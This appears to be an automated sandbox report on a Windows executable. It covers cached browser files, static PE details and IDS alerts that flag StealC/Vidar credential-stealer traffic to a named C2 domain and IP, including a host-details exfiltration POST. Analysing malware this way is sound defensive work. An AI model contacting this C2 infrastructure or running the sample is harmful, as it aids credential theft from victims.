                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 456

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                          Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 457

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9729852136228745
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                          File name:pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File size:899'095 bytes
                                                                                                                                                                                                                                                                                          MD5:c5f715f9eefa5e42fd10fc3b6e90953b
                                                                                                                                                                                                                                                                                          SHA1:92ae82a3ce9799e2af542597f9edb94c4ef1d6c5
                                                                                                                                                                                                                                                                                          SHA256:f5ad3ca6464635488824c3e5b6284ca263e7c6417ec854692d839a1c008d5e23
                                                                                                                                                                                                                                                                                          SHA512:1335f65b2019421b8fb1a706dba5dd33e3b2c43685d9b6f2bb8656c4097e1f7281358ad4d0ef87620fe2efa9ea5c00af10cba22e9c7a3c6f0049292518207175
                                                                                                                                                                                                                                                                                          SSDEEP:24576:S3BBt7zXHyaroKgT3yniH3Vn/WsNGJ2S5mFZIb8jJ61IHic:Eo9CniHl+sNu54gUKK
                                                                                                                                                                                                                                                                                          TLSH:FA152397EEC86D06EAD30E7034F0B6156F32B6201A75D6AFD358C65D3EA06825C2C376
                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                                          Icon Hash:3673c1c96933035f

                                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                                          Signature Issuer:CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                                          • 17/01/2016 19:00:00 27/03/2019 08:00:00
                                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                                          • CN=Hamrick Software, O=Hamrick Software, L=Sunny Isles Beach, S=Florida, C=US
                                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                                          Thumbprint MD5:EED0330F674889C759718E9634C7CFBE
                                                                                                                                                                                                                                                                                          Thumbprint SHA-1:72DA31A1E39FF2688E01CC9246F9655C5479DC44
                                                                                                                                                                                                                                                                                          Thumbprint SHA-256:2F0E03F8BCDEEFFF96E71C8AFD36F929E0DABD73E2991FF44A5F571DE8BC4D20
                                                                                                                                                                                                                                                                                          Serial:0E3580050E04BCD215040A908ECA4FCA

                                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                          call 00007FCED06E6B5Bh
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push 000002B4h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push 0040A264h
                                                                                                                                                                                                                                                                                          call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                          push 0040A24Ch
                                                                                                                                                                                                                                                                                          push 00476AA0h
                                                                                                                                                                                                                                                                                          call 00007FCED06E683Dh
                                                                                                                                                                                                                                                                                          call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          call 00007FCED06E682Bh
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                          cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                                                          jne 00007FCED06E412Ah
                                                                                                                                                                                                                                                                                          push 00000022h
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          call 00007FCED06E6501h
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                          jmp 00007FCED06E41B3h
                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                                          cmp ax, bx
                                                                                                                                                                                                                                                                                          jne 00007FCED06E412Ah
                                                                                                                                                                                                                                                                                          add esi, 02h
                                                                                                                                                                                                                                                                                          cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000xa9a2.rsrc
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xd7e2f0x39e8.ndata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                          .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .rsrc0x1000000xa9a20xaa00c926895c2febff432824055c5777f47fFalse0.9693933823529411data7.906509665720962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .reloc0x10b0000xfd60x10007c4854a2b1b8a5c7c537ee59a4a60e92False0.59814453125data5.597703433351911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                          RT_ICON0x1001f00x7ba9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005054174432195
                                                                                                                                                                                                                                                                                          RT_ICON0x107d9c0x221aPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012600229095074
                                                                                                                                                                                                                                                                                          RT_ICON0x109fb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6640070921985816
                                                                                                                                                                                                                                                                                          RT_DIALOG0x10a4200x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                          RT_DIALOG0x10a5200x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                          RT_DIALOG0x10a63c0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x10a69c0x30dataEnglishUnited States0.8958333333333334
                                                                                                                                                                                                                                                                                          RT_MANIFEST0x10a6cc0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                          KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                          USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                          SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:18.190912+01002058401ET MALWARE StealC/Vidar CnC Domain in DNS Lookup (hulkpara .xyz)1192.168.2.7495321.1.1.153UDP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:20.427564+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971194.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:22.521418+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971294.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:23.416803+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.74971294.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:24.821968+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971394.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:27.119770+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971494.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:28.014169+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config194.130.191.168443192.168.2.749714TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:29.423259+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971594.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:30.307378+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.74971594.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:30.307549+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1194.130.191.168443192.168.2.749715TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:31.723358+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971694.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:32.954374+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74971794.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:40.831957+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74973694.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:41.880678+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74973794.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:43.947680+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74973994.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:45.968071+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74974094.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:46.973345+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74974194.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:53.767368+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74976094.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:54.635958+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74977094.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:56.820152+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74978994.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:13:58.754131+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74980794.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:14:00.909391+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74981694.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:14:02.947261+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74982594.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:14:05.283778+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74983294.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:14:06.624975+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74984294.130.191.168443TCP
                                                                                                                                                                                                                                                                                          2024-12-19T08:14:08.909675+01002058402ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI)1192.168.2.74985094.130.191.168443TCP
